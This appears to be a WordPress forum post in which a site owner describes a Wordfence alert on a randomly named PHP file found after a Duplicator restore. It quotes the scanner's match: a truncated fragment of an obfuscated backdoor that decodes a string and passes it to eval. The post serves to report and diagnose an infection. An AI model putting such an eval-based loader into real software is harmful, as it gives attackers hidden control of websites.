I just had a similar randomly named php file flagged as this Backdoor by Wordfence and have since deleted it after saving as a text file in case needed for investigation.
I have no idea how it got there but I had just restored this site from a multisite to a single site using Duplicator. The original site is gone so I can’t check if it was in the original. I don’t think Wordfence was running on the original site but it was up date with all its installed plugins/themes.
Filename: wp-content/plugins/fb6a67f0.php
File Type: Not a core, theme, or plugin file from www.remarpro.com.
Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: chr(ord($bIzRMB[$i])-1);\x0d\x0a } return $bIzRMB;\x0d\x0a}\x0d\x0aeval(WkKig(“NZznjuxakp0foJ/iQugf3SAEeodRS2DSe5P0giDQJslMes+Bnl37YGbun1uoqlNVySR3RKz1rfjrrz//1ftQbO04/BUYu/Bp/vF3oUuX+J9/+/e//vYfH/7r87RD/cu26h95tlYU…
The issue type is: Backdoor:PHP/nbmj.3900
Description: A backdoor known as nbmj
